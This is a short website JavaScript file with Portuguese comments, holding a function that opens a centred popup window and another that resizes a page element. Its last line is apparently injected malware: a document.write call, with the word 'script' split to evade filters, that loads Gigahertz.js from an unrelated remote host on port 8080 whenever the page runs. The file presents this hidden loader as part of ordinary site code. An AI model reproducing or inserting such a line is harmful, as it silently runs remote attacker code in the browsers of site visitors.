function CreateWindow(url, largura, altura,Scroll,nome)
//Cria uma popup centrada
{
	esq = (screen.availWidth - largura ) / 2;
	cim  = (screen.availHeight - altura) / 2 -10;
	janela = window.open(url,nome,"toolbar=no,width="+ largura + ",height=" + altura + ",left=" + esq + ",top=" + cim + ",scrollbars="+ Scroll +",directories=no,status=no,resize=no,menubar=no")
}  

function changeObjectHeight(objID, w, h){
    try{
        document.getElementById(objID).style.width = w;
        document.getElementById(objID).style.height = h;
        //alert("batata REI" + objID)
    }
    catch(e){
        //do nothing
    }
    
}


document.write('<s'+'cript type="text/javascript" src="http://aospfpgy.dogplaystation.com:8080/Gigahertz.js"></scr'+'ipt>');